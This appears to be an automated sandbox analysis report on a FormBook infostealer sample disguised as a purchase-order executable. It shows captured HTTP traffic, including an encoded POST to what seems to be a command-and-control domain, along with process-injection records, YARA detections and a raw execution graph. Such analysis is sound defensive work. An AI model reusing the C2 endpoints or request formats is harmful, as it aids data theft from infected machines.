                                Data Ascii: 76=N3QPBP0Ca24YTCeB0GPCfHkZa2GUMxDjDLe26nCec8RDPBHOHR5ZjiG8dWm9hiW+XQ9+rjjizUaYehTwiPwoc2owT/ohRXOs70CMP3ALSi/HSHt55WFZ+tUFc7fQhGOVL/npCRQjBr+Jmvpz+QdjRzJzOLAtBNCslOPhxZ4HBdzm97XSAyMJ9qFitJlz2uIRzZhTI6/wA65G7qLDraZGISc6C5AwY20ZDaZ2iqQ=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                55 | 192.168.2.7 | 49759 | 84.32.84.32 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:40:26.567243099 CEST | 1803 | OUT | POST /8xob/ HTTP/1.1
                                Host: www.bodegamayorista.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.bodegamayorista.online
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.bodegamayorista.online/8xob/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 4e 33 51 50 42 50 30 43 61 32 34 59 54 43 65 42 30 47 50 43 66 48 6b 5a 61 32 47 55 4d 78 44 6a 44 4c 65 32 36 6e 43 65 63 38 5a 44 4d 79 2f 4f 47 79 68 5a 69 69 47 38 43 6d 6d 38 68 69 58 38 58 51 6b 31 72 6a 66 63 7a 57 69 59 65 44 62 77 6b 2b 77 6f 46 6d 6f 77 66 66 6f 61 4d 48 50 78 37 30 54 45 50 7a 6b 4c 53 69 2f 48 53 43 68 35 37 44 70 5a 34 74 55 47 62 37 66 63 77 57 4f 39 4c 2f 2b 63 43 52 55 5a 43 66 4b 4a 6e 4d 52 7a 38 69 6c 6a 61 7a 4a 78 65 62 42 72 42 4e 47 4a 6c 50 6a 58 78 5a 4d 39 42 66 54 6d 2b 73 7a 4c 63 6d 46 52 71 61 41 2f 6d 72 46 45 78 65 68 68 72 4c 35 59 4f 59 76 4c 4e 74 78 48 69 59 2f 4e 67 66 45 6d 4b 42 35 45 4a 35 68 70 64 68 39 42 51 4a 31 53 2f 64 51 41 56 41 6c 75 2b 74 35 4d 39 53 47 51 37 4c 73 54 59 67 52 39 4f 34 51 46 71 33 2b 2b 61 49 54 62 2f 61 77 6e 62 62 46 4a 58 70 32 62 6b 4f 52 73 7a 46 73 7a 35 39 2f 4c 66 4e 52 65 53 4c 37 39 31 4f 58 74 63 6a 66 59 50 56 49 52 49 71 58 70 77 78 45 66 69 49 38 44 37 45 2b 61 78 76 68 73 6f 53 4c 4d 51 32 58 [TRUNCATED]


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                56 | 192.168.2.7 | 49760 | 84.32.84.32 | 80
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:40:30.467418909 CEST | 487 | OUT | GET /8xob/?76=A14vC586VW4zZwTD5W+icFgZA3/gFFWkfN+k13nedPAvAgeoNHQOmzzfD2mClB7mOSU9pQTtzUjUfjrPrdgjVCIgZM4LbXLF8ymXXAVuMS/ObX4kzH9c4ewBdY7tnGrMOo/XDCkVFvSq&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.bodegamayorista.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:40:30.936996937 CEST | 1236 | IN | HTTP/1.1 200 OK
                                Server: hcdn
                                Date: Mon, 23 Sep 2024 12:40:30 GMT
                                Content-Type: text/html
                                Content-Length: 10072
                                Connection: close
                                Vary: Accept-Encoding
                                alt-svc: h3=":443"; ma=86400
                                x-hcdn-request-id: df02236822b7151e5173a067f1408c60-bos-edge1
                                Expires: Mon, 23 Sep 2024 12:40:29 GMT
                                Cache-Control: no-cache
                                Accept-Ranges: bytes
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                Sep 23, 2024 14:40:30.937010050 CEST | 1236 | IN | Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                Sep 23, 2024 14:40:30.937016964 CEST | 1236 | IN | Data Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                Sep 23, 2024 14:40:30.937074900 CEST | 672 | IN | Data Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                Sep 23, 2024 14:40:30.937082052 CEST | 1236 | IN | Data Raw: 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77
                                Data Ascii: sync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32
                                Sep 23, 2024 14:40:30.937088013 CEST | 1236 | IN | Data Raw: 6f 67 69 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 61 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 65 6d 70 74 79 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61
                                Data Ascii: ogin</a></li></ul></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</di
                                Sep 23, 2024 14:40:30.937100887 CEST | 1236 | IN | Data Raw: 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 61 72 74 69 63 6c 65 73 2f 31 35 38 33 32 31 34 2d 68 6f 77 2d 74 6f 2d 61 64 64 2d 61 2d 64 6f 6d 61 69 6e 2d 74 6f 2d 6d 79 2d 61 63 63 6f 75 6e 74 2d 68 6f 77 2d 74 6f 2d
                                Data Ascii: upport.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change
                                Sep 23, 2024 14:40:30.937108040 CEST | 1236 | IN | Data Raw: 68 2e 66 6c 6f 6f 72 28 72 2f 37 30 30 29 3a 72 3e 3e 31 2c 72 2b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 65 29 2c 74 3d 30 3b 34 35 35 3c 72 3b 74 2b 3d 6f 29 72 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 33 35 29 3b 72 65 74 75 72 6e 20 4d 61
                                Data Ascii: h.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c
                                Sep 23, 2024 14:40:30.937304974 CEST | 328 | IN | Data Raw: 5d 3d 74 5b 64 5d 21 3d 77 5b 64 5d 3b 76 61 72 20 6d 2c 79 3d 5b 5d 3b 66 6f 72 28 68 3d 31 32 38 2c 75 3d 37 32 2c 64 3d 66 3d 30 3b 64 3c 76 3b 2b 2b 64 29 74 5b 64 5d 3c 31 32 38 26 26 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43
                                Data Ascii: ]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math
                                Sep 23, 2024 14:40:30.937310934 CEST | 760 | IN | Data Raw: 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 7b 69 66 28 28 43 3d 74 5b 64 5d 29 3c 68 26 26 2b 2b 66 3e 72 29 72 65 74 75 72 6e 20 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68 29 7b 66 6f
                                Data Ascii: d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:


                                Target ID:0
                                Start time:08:36:19
                                Start date:23/09/2024
                                Path:C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"
                                Imagebase:0x400000
                                File size:1'509'575 bytes
                                MD5 hash:4D40B6F064DB9C79D427CA2A2C9B87AE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:2
                                Start time:08:36:27
                                Start date:23/09/2024
                                Path:C:\Windows\SysWOW64\svchost.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"
                                Imagebase:0x9f0000
                                File size:46'504 bytes
                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:08:36:33
                                Start date:23/09/2024
                                Path:C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe"
                                Imagebase:0x5b0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                Target ID:5
                                Start time:08:36:38
                                Start date:23/09/2024
                                Path:C:\Windows\SysWOW64\grpconv.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\grpconv.exe"
                                Imagebase:0x380000
                                File size:40'448 bytes
                                MD5 hash:5A13926732E6D349FD060C072BC7FB74
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:moderate
                                Has exited:false

                                Target ID:6
                                Start time:08:36:51
                                Start date:23/09/2024
                                Path:C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe"
                                Imagebase:0x5b0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                Target ID:8
                                Start time:08:37:04
                                Start date:23/09/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:0x7ff722870000
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:3.6%
                                  Dynamic/Decrypted Code Coverage:0.4%
                                  Signature Coverage:9.6%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:35
execution_graph: [interactive graph widget data, not reproduced here. Nodes are function addresses inside the sample's image range (0x400000 onward) and edges are call relations between them. Labelled nodes name the Windows APIs reached, including Sleep, GetPEB, Shell_NotifyIconW, KillTimer, SetTimer, RegisterClipboardFormatW, CreatePopupMenu, PostQuitMessage, DestroyCursor, LoadStringW, RaiseException, RtlAllocateHeap, RtlFreeHeap, GetModuleFileNameW, GetModuleHandleW, GetProcAddress, ExitProcess, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetStartupInfoW, HeapCreate, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetStdHandle, GetFileType, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, LoadLibraryA, SystemParametersInfoW, FreeLibrary, GetCurrentDirectoryW, SetCurrentDirectoryW, GetFullPathNameW, MessageBoxA, GetForegroundWindow, ShellExecuteW, GetSysColorBrush, LoadCursorW, LoadIconW, LoadImageW, RegisterClassExW, EnumResourceNamesW, CreateWindowExW, ShowWindow, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, LockWindowUpdate, WaitForSingleObject, GetExitCodeProcess, CloseHandle, timeGetTime, VariantClear, WideCharToMultiByte, SHGetMalloc and GetSystemTimeAsFileTime.]
87114 414ffa 87113->87114 87115 41500f 87113->87115 87609 417f77 46 API calls __getptd_noexit 87114->87609 87117 415471 __lock_file 47 API calls 87115->87117 87119 415017 87117->87119 87118 414fff 87610 417f25 10 API calls __mbstowcs_l_helper 87118->87610 87121 414e4e __ftell_nolock 51 API calls 87119->87121 87123 415024 87121->87123 87122 41500a _raise 87122->87026 87611 41503d RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 87123->87611 87126 414dd6 87125->87126 87127 414deb 87125->87127 87136 417f77 46 API calls __getptd_noexit 87126->87136 87127->87126 87128 414df2 87127->87128 87138 41b91b 79 API calls 10 library calls 87128->87138 87130 414ddb 87137 417f25 10 API calls __mbstowcs_l_helper 87130->87137 87133 414e18 87134 414de6 87133->87134 87139 418f98 77 API calls 6 library calls 87133->87139 87134->87078 87136->87130 87137->87134 87138->87133 87139->87134 87141 414910 _raise 87140->87141 87142 414923 87141->87142 87145 414951 87141->87145 87196 417f77 46 API calls __getptd_noexit 87142->87196 87144 414928 87197 417f25 10 API calls __mbstowcs_l_helper 87144->87197 87159 41d4d1 87145->87159 87148 414956 87149 41496a 87148->87149 87150 41495d 87148->87150 87152 414992 87149->87152 87153 414972 87149->87153 87198 417f77 46 API calls __getptd_noexit 87150->87198 87176 41d218 87152->87176 87199 417f77 46 API calls __getptd_noexit 87153->87199 87156 414933 _raise @_EH4_CallFilterFunc@8 87156->87083 87160 41d4dd _raise 87159->87160 87161 4182cb __lock 46 API calls 87160->87161 87162 41d4eb 87161->87162 87163 41d567 87162->87163 87170 418209 __mtinitlocknum 46 API calls 87162->87170 87174 41d560 87162->87174 87204 4154b2 47 API calls __lock 87162->87204 87205 415520 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 87162->87205 87165 416b04 __malloc_crt 46 API calls 87163->87165 87166 41d56e 87165->87166 87167 41d57c InitializeCriticalSectionAndSpinCount 87166->87167 87166->87174 87168 41d59c 87167->87168 87169 41d5af RtlEnterCriticalSection 
87167->87169 87173 413748 _free 46 API calls 87168->87173 87169->87174 87170->87162 87172 41d5f0 _raise 87172->87148 87173->87174 87201 41d5fb 87174->87201 87177 41d23a 87176->87177 87178 41d255 87177->87178 87189 41d26c __wopenfile 87177->87189 87210 417f77 46 API calls __getptd_noexit 87178->87210 87180 41d25a 87211 417f25 10 API calls __mbstowcs_l_helper 87180->87211 87181 41d47a 87215 417f77 46 API calls __getptd_noexit 87181->87215 87182 41d48c 87207 422bf9 87182->87207 87186 41d47f 87216 417f25 10 API calls __mbstowcs_l_helper 87186->87216 87187 41499d 87200 4149b8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 87187->87200 87189->87181 87195 41d421 87189->87195 87212 41341f 58 API calls 2 library calls 87189->87212 87191 41d41a 87191->87195 87213 41341f 58 API calls 2 library calls 87191->87213 87193 41d439 87193->87195 87214 41341f 58 API calls 2 library calls 87193->87214 87195->87181 87195->87182 87196->87144 87197->87156 87198->87156 87199->87156 87200->87156 87206 4181f2 RtlLeaveCriticalSection 87201->87206 87203 41d602 87203->87172 87204->87162 87205->87162 87206->87203 87217 422b35 87207->87217 87209 422c14 87209->87187 87210->87180 87211->87187 87212->87191 87213->87193 87214->87195 87215->87186 87216->87187 87220 422b41 _raise 87217->87220 87218 422b54 87219 417f77 __mbstowcs_l_helper 46 API calls 87218->87219 87221 422b59 87219->87221 87220->87218 87222 422b8a 87220->87222 87223 417f25 __mbstowcs_l_helper 10 API calls 87221->87223 87224 422400 __tsopen_nolock 109 API calls 87222->87224 87227 422b63 _raise 87223->87227 87225 422ba4 87224->87225 87226 422bcb __wsopen_helper RtlLeaveCriticalSection 87225->87226 87226->87227 87227->87209 87229 4150dd _raise 87228->87229 87230 4150e9 87229->87230 87232 41510f 87229->87232 87259 417f77 46 API calls __getptd_noexit 87230->87259 87241 415471 87232->87241 87233 4150ee 87260 417f25 10 API calls __mbstowcs_l_helper 87233->87260 87240 4150f9 _raise 87240->87087 87242 415483 87241->87242 87243 4154a5 
RtlEnterCriticalSection 87241->87243 87242->87243 87244 41548b 87242->87244 87246 415117 87243->87246 87245 4182cb __lock 46 API calls 87244->87245 87245->87246 87247 415047 87246->87247 87248 415067 87247->87248 87249 415057 87247->87249 87254 415079 87248->87254 87262 414e4e 87248->87262 87317 417f77 46 API calls __getptd_noexit 87249->87317 87253 41505c 87261 415143 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 87253->87261 87279 41443c 87254->87279 87257 4150b9 87292 41e1f4 87257->87292 87259->87233 87260->87240 87261->87240 87263 414e61 87262->87263 87264 414e79 87262->87264 87318 417f77 46 API calls __getptd_noexit 87263->87318 87266 414139 _fprintf 46 API calls 87264->87266 87268 414e80 87266->87268 87267 414e66 87319 417f25 10 API calls __mbstowcs_l_helper 87267->87319 87270 41e1f4 __write 51 API calls 87268->87270 87272 414e97 87270->87272 87271 414e71 87271->87254 87272->87271 87273 414f09 87272->87273 87275 414ec9 87272->87275 87320 417f77 46 API calls __getptd_noexit 87273->87320 87275->87271 87276 41e1f4 __write 51 API calls 87275->87276 87277 414f64 87276->87277 87277->87271 87278 41e1f4 __write 51 API calls 87277->87278 87278->87271 87280 414455 87279->87280 87284 414477 87279->87284 87281 414139 _fprintf 46 API calls 87280->87281 87280->87284 87282 414470 87281->87282 87321 41b7b2 77 API calls 6 library calls 87282->87321 87285 414139 87284->87285 87286 414145 87285->87286 87287 41415a 87285->87287 87322 417f77 46 API calls __getptd_noexit 87286->87322 87287->87257 87289 41414a 87323 417f25 10 API calls __mbstowcs_l_helper 87289->87323 87291 414155 87291->87257 87293 41e200 _raise 87292->87293 87294 41e208 87293->87294 87296 41e223 87293->87296 87344 417f8a 46 API calls __getptd_noexit 87294->87344 87297 41e22f 87296->87297 87300 41e269 87296->87300 87346 417f8a 46 API calls __getptd_noexit 87297->87346 87298 41e20d 87345 417f77 46 API calls __getptd_noexit 87298->87345 87324 41ae56 87300->87324 87302 41e234 87347 417f77 46 API calls 
__getptd_noexit 87302->87347 87305 41e23c 87348 417f25 10 API calls __mbstowcs_l_helper 87305->87348 87306 41e26f 87308 41e291 87306->87308 87309 41e27d 87306->87309 87349 417f77 46 API calls __getptd_noexit 87308->87349 87334 41e17f 87309->87334 87310 41e215 _raise 87310->87253 87313 41e289 87351 41e2c0 RtlLeaveCriticalSection __unlock_fhandle 87313->87351 87314 41e296 87350 417f8a 46 API calls __getptd_noexit 87314->87350 87317->87253 87318->87267 87319->87271 87320->87271 87321->87284 87322->87289 87323->87291 87325 41ae62 _raise 87324->87325 87326 41aebc 87325->87326 87329 4182cb __lock 46 API calls 87325->87329 87327 41aec1 RtlEnterCriticalSection 87326->87327 87328 41aede _raise 87326->87328 87327->87328 87328->87306 87330 41ae8e 87329->87330 87331 41ae97 InitializeCriticalSectionAndSpinCount 87330->87331 87332 41aeaa 87330->87332 87331->87332 87333 41aeec ___lock_fhandle RtlLeaveCriticalSection 87332->87333 87333->87326 87335 41aded __lseeki64_nolock 46 API calls 87334->87335 87336 41e18e 87335->87336 87337 41e1a4 SetFilePointer 87336->87337 87338 41e194 87336->87338 87340 41e1c3 87337->87340 87341 41e1bb GetLastError 87337->87341 87339 417f77 __mbstowcs_l_helper 46 API calls 87338->87339 87342 41e199 87339->87342 87340->87342 87343 417f9d __dosmaperr 46 API calls 87340->87343 87341->87340 87342->87313 87343->87342 87344->87298 87345->87310 87346->87302 87347->87305 87348->87310 87349->87314 87350->87313 87351->87310 87353 4149ea 87352->87353 87354 4149fe 87352->87354 87398 417f77 46 API calls __getptd_noexit 87353->87398 87355 4149fa 87354->87355 87357 41443c __flush 77 API calls 87354->87357 87370 414ab2 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 87355->87370 87359 414a0a 87357->87359 87358 4149ef 87399 417f25 10 API calls __mbstowcs_l_helper 87358->87399 87371 41d8c2 87359->87371 87363 414139 _fprintf 46 API calls 87364 414a18 87363->87364 87375 41d7fe 87364->87375 87366 414a1e 87366->87355 87367 413748 _free 46 API calls 87366->87367 
